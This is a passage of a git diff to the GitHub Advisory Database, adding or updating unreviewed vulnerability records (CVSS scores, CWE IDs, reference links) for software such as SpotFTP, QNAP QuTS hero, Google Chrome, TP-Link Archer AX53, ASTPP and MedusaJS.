"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37208" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47849" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotftp-ftp-password-recovery-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-35fp-m999-3h79/GHSA-35fp-m999-3h79.json b/advisories/unreviewed/2026/02/GHSA-35fp-m999-3h79/GHSA-35fp-m999-3h79.json index ca41b111250dd..a9f8c3befe4ac 100644 --- a/advisories/unreviewed/2026/02/GHSA-35fp-m999-3h79/GHSA-35fp-m999-3h79.json +++ b/advisories/unreviewed/2026/02/GHSA-35fp-m999-3h79/GHSA-35fp-m999-3h79.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json b/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json index b6f78c5f438e7..cf6eecf5e5940 100644 --- a/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json +++ b/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-36h4-32cj-m84w", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:39Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-48725" ], "details": "A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3745-9rxm-69m7/GHSA-3745-9rxm-69m7.json b/advisories/unreviewed/2026/02/GHSA-3745-9rxm-69m7/GHSA-3745-9rxm-69m7.json new file mode 100644 index 0000000000000..2760edc3490e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3745-9rxm-69m7/GHSA-3745-9rxm-69m7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3745-9rxm-69m7", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37209" + ], + "details": "SpotFTP 3.0.0.0 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37209" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47868" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotftp-ftp-password-recovery-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3757-h5gm-6pj5/GHSA-3757-h5gm-6pj5.json b/advisories/unreviewed/2026/02/GHSA-3757-h5gm-6pj5/GHSA-3757-h5gm-6pj5.json index 0d188fc082e36..db390ddd62851 100644 --- a/advisories/unreviewed/2026/02/GHSA-3757-h5gm-6pj5/GHSA-3757-h5gm-6pj5.json +++ b/advisories/unreviewed/2026/02/GHSA-3757-h5gm-6pj5/GHSA-3757-h5gm-6pj5.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-37gh-h6xp-rvc2/GHSA-37gh-h6xp-rvc2.json b/advisories/unreviewed/2026/02/GHSA-37gh-h6xp-rvc2/GHSA-37gh-h6xp-rvc2.json index da7455b5d23f2..92a679abc2cd3 100644 --- a/advisories/unreviewed/2026/02/GHSA-37gh-h6xp-rvc2/GHSA-37gh-h6xp-rvc2.json +++ b/advisories/unreviewed/2026/02/GHSA-37gh-h6xp-rvc2/GHSA-37gh-h6xp-rvc2.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-3c9r-jvh7-2xjm/GHSA-3c9r-jvh7-2xjm.json b/advisories/unreviewed/2026/02/GHSA-3c9r-jvh7-2xjm/GHSA-3c9r-jvh7-2xjm.json index e2b03ba0ee7e4..7ddb6dcacf84e 100644 --- a/advisories/unreviewed/2026/02/GHSA-3c9r-jvh7-2xjm/GHSA-3c9r-jvh7-2xjm.json +++ b/advisories/unreviewed/2026/02/GHSA-3c9r-jvh7-2xjm/GHSA-3c9r-jvh7-2xjm.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-3fc2-jfpg-8jg5/GHSA-3fc2-jfpg-8jg5.json b/advisories/unreviewed/2026/02/GHSA-3fc2-jfpg-8jg5/GHSA-3fc2-jfpg-8jg5.json new file mode 100644 index 0000000000000..659c0f5cd948d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3fc2-jfpg-8jg5/GHSA-3fc2-jfpg-8jg5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fc2-jfpg-8jg5", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37175" + ], + "details": "P2PWIFICAM2 for iOS 10.4.1 contains a denial of service vulnerability that allows attackers to crash the application by manipulating the Camera ID input field. Attackers can paste a 257-character buffer into the Camera ID field to trigger an application crash on iOS devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37175" + }, + { + "type": "WEB", + "url": "https://download.cnet.com/p2pwificam2/3000-12511_4-76835814.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47993" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ppwificam-for-ios-camera-id-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3grf-qxvr-p8vp/GHSA-3grf-qxvr-p8vp.json b/advisories/unreviewed/2026/02/GHSA-3grf-qxvr-p8vp/GHSA-3grf-qxvr-p8vp.json index 5e457b251a4b8..f336bff616909 100644 --- a/advisories/unreviewed/2026/02/GHSA-3grf-qxvr-p8vp/GHSA-3grf-qxvr-p8vp.json +++ b/advisories/unreviewed/2026/02/GHSA-3grf-qxvr-p8vp/GHSA-3grf-qxvr-p8vp.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-3mf8-2573-7cx8/GHSA-3mf8-2573-7cx8.json b/advisories/unreviewed/2026/02/GHSA-3mf8-2573-7cx8/GHSA-3mf8-2573-7cx8.json new file mode 100644 index 0000000000000..381389ce52ac3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3mf8-2573-7cx8/GHSA-3mf8-2573-7cx8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mf8-2573-7cx8", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2323" + ], + "details": "Inappropriate implementation in Downloads in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2323" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/467442136" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42ww-368q-gjw4/GHSA-42ww-368q-gjw4.json b/advisories/unreviewed/2026/02/GHSA-42ww-368q-gjw4/GHSA-42ww-368q-gjw4.json new file mode 100644 index 0000000000000..15ff8bbdb948b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42ww-368q-gjw4/GHSA-42ww-368q-gjw4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42ww-368q-gjw4", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37202" + ], + "details": "NetworkSleuth 3.0.0.0 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized registration key. Attackers can generate a 1000-character buffer payload and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37202" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47853" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/networksleuth-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json b/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json new file mode 100644 index 0000000000000..1da5c61ff4db7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44j4-34hp-pwwr", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-26479" + ], + "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the Command execution function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26479" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc/tree/main/CVE-2024-26479" + }, + { + "type": "WEB", + "url": "https://github.com/statping-ng/statping-ng" + }, + { + "type": "WEB", + "url": "https://statping-ng.github.io" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4r8r-m45w-c7cj/GHSA-4r8r-m45w-c7cj.json b/advisories/unreviewed/2026/02/GHSA-4r8r-m45w-c7cj/GHSA-4r8r-m45w-c7cj.json index 173f37eba7e2c..517544a6f9d3e 100644 --- a/advisories/unreviewed/2026/02/GHSA-4r8r-m45w-c7cj/GHSA-4r8r-m45w-c7cj.json +++ b/advisories/unreviewed/2026/02/GHSA-4r8r-m45w-c7cj/GHSA-4r8r-m45w-c7cj.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-4r9x-qh7r-9qv9/GHSA-4r9x-qh7r-9qv9.json b/advisories/unreviewed/2026/02/GHSA-4r9x-qh7r-9qv9/GHSA-4r9x-qh7r-9qv9.json new file mode 100644 index 0000000000000..43fe9f8e42d1a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4r9x-qh7r-9qv9/GHSA-4r9x-qh7r-9qv9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r9x-qh7r-9qv9", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2313" + ], + "details": "Use after free in CSS in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2313" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/467297219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4w34-9hcr-4jm4/GHSA-4w34-9hcr-4jm4.json b/advisories/unreviewed/2026/02/GHSA-4w34-9hcr-4jm4/GHSA-4w34-9hcr-4jm4.json new file mode 100644 index 0000000000000..c7aba687d2cb0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4w34-9hcr-4jm4/GHSA-4w34-9hcr-4jm4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w34-9hcr-4jm4", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37215" + ], + "details": "MSN Password Recovery version 1.30 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized input in the registration code field. Attackers can generate a 9000-byte buffer of repeated characters and paste it into the 'User Name and Registration Code' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37215" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47839" + }, + { + "type": "WEB", + "url": "https://www.top-password.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/msn-password-recovery-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5cch-r4ff-mh3m/GHSA-5cch-r4ff-mh3m.json b/advisories/unreviewed/2026/02/GHSA-5cch-r4ff-mh3m/GHSA-5cch-r4ff-mh3m.json index 7c78404f10c92..76ed0da5b966a 100644 --- a/advisories/unreviewed/2026/02/GHSA-5cch-r4ff-mh3m/GHSA-5cch-r4ff-mh3m.json +++ b/advisories/unreviewed/2026/02/GHSA-5cch-r4ff-mh3m/GHSA-5cch-r4ff-mh3m.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-5fv4-54xw-v6jx/GHSA-5fv4-54xw-v6jx.json b/advisories/unreviewed/2026/02/GHSA-5fv4-54xw-v6jx/GHSA-5fv4-54xw-v6jx.json index 57b8187c44168..1a6ee95ddb2c4 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fv4-54xw-v6jx/GHSA-5fv4-54xw-v6jx.json +++ b/advisories/unreviewed/2026/02/GHSA-5fv4-54xw-v6jx/GHSA-5fv4-54xw-v6jx.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5fv4-54xw-v6jx", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-61944" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing an excessive number of fields with zero‑length values.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5gpf-8prr-whq8/GHSA-5gpf-8prr-whq8.json b/advisories/unreviewed/2026/02/GHSA-5gpf-8prr-whq8/GHSA-5gpf-8prr-whq8.json index 547d68358d84b..ae59a032ab904 100644 --- a/advisories/unreviewed/2026/02/GHSA-5gpf-8prr-whq8/GHSA-5gpf-8prr-whq8.json +++ b/advisories/unreviewed/2026/02/GHSA-5gpf-8prr-whq8/GHSA-5gpf-8prr-whq8.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-64v7-64h5-r58h/GHSA-64v7-64h5-r58h.json b/advisories/unreviewed/2026/02/GHSA-64v7-64h5-r58h/GHSA-64v7-64h5-r58h.json new file mode 100644 index 0000000000000..61a85cb615d45 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-64v7-64h5-r58h/GHSA-64v7-64h5-r58h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64v7-64h5-r58h", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37182" + ], + "details": "Redir 3.3 contains a stack overflow vulnerability in the doproxyconnect() function that allows attackers to crash the application by sending oversized input. Attackers can exploit the sprintf() buffer without proper length checking to overwrite memory and cause a segmentation fault, resulting in program termination.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37182" + }, + { + "type": "WEB", + "url": "https://github.com/troglobit/redir" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47919" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/redir-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-659g-9v9q-gq45/GHSA-659g-9v9q-gq45.json b/advisories/unreviewed/2026/02/GHSA-659g-9v9q-gq45/GHSA-659g-9v9q-gq45.json index bb103c152fdbd..be6e33d2c338f 100644 --- a/advisories/unreviewed/2026/02/GHSA-659g-9v9q-gq45/GHSA-659g-9v9q-gq45.json +++ b/advisories/unreviewed/2026/02/GHSA-659g-9v9q-gq45/GHSA-659g-9v9q-gq45.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-684h-gqgj-c42j/GHSA-684h-gqgj-c42j.json b/advisories/unreviewed/2026/02/GHSA-684h-gqgj-c42j/GHSA-684h-gqgj-c42j.json index e6e8d28c34a25..0695e7185dd98 100644 --- a/advisories/unreviewed/2026/02/GHSA-684h-gqgj-c42j/GHSA-684h-gqgj-c42j.json +++ b/advisories/unreviewed/2026/02/GHSA-684h-gqgj-c42j/GHSA-684h-gqgj-c42j.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-6m88-cmrp-47r3/GHSA-6m88-cmrp-47r3.json b/advisories/unreviewed/2026/02/GHSA-6m88-cmrp-47r3/GHSA-6m88-cmrp-47r3.json index f1955c6923384..de49c3a8a2513 100644 --- a/advisories/unreviewed/2026/02/GHSA-6m88-cmrp-47r3/GHSA-6m88-cmrp-47r3.json +++ b/advisories/unreviewed/2026/02/GHSA-6m88-cmrp-47r3/GHSA-6m88-cmrp-47r3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6m88-cmrp-47r3", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-61983" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing an excessive number of fields with zero‑length values.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-6p6h-r7gh-4hj6/GHSA-6p6h-r7gh-4hj6.json b/advisories/unreviewed/2026/02/GHSA-6p6h-r7gh-4hj6/GHSA-6p6h-r7gh-4hj6.json new file mode 100644 index 0000000000000..812f73e5f0040 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6p6h-r7gh-4hj6/GHSA-6p6h-r7gh-4hj6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p6h-r7gh-4hj6", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37153" + ], + "details": "ASTPP 4.0.1 contains multiple vulnerabilities including cross-site scripting and command injection in SIP device configuration and plugin management interfaces. Attackers can exploit these flaws to inject system commands, hijack administrator sessions, and potentially execute arbitrary code with root permissions through cron task manipulation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37153" + }, + { + "type": "WEB", + "url": "https://github.com/iNextrix/ASTPP" + }, + { + "type": "WEB", + "url": "https://www.astppbilling.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47889" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/astpp-voip-remote-code-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json b/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json new file mode 100644 index 0000000000000..107d11d52d918 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6r9h-3c6p-4chm", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-69871" + ], + "details": "A race condition vulnerability exists in MedusaJS Medusa v2.12.2 and earlier in the registerUsage() function of the promotion module. The function performs a non-atomic read-check-update operation when enforcing promotion usage limits. This allows unauthenticated remote attackers to bypass usage limits by sending concurrent checkout requests, resulting in unlimited redemptions of limited-use promotional codes and potential financial loss.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69871" + }, 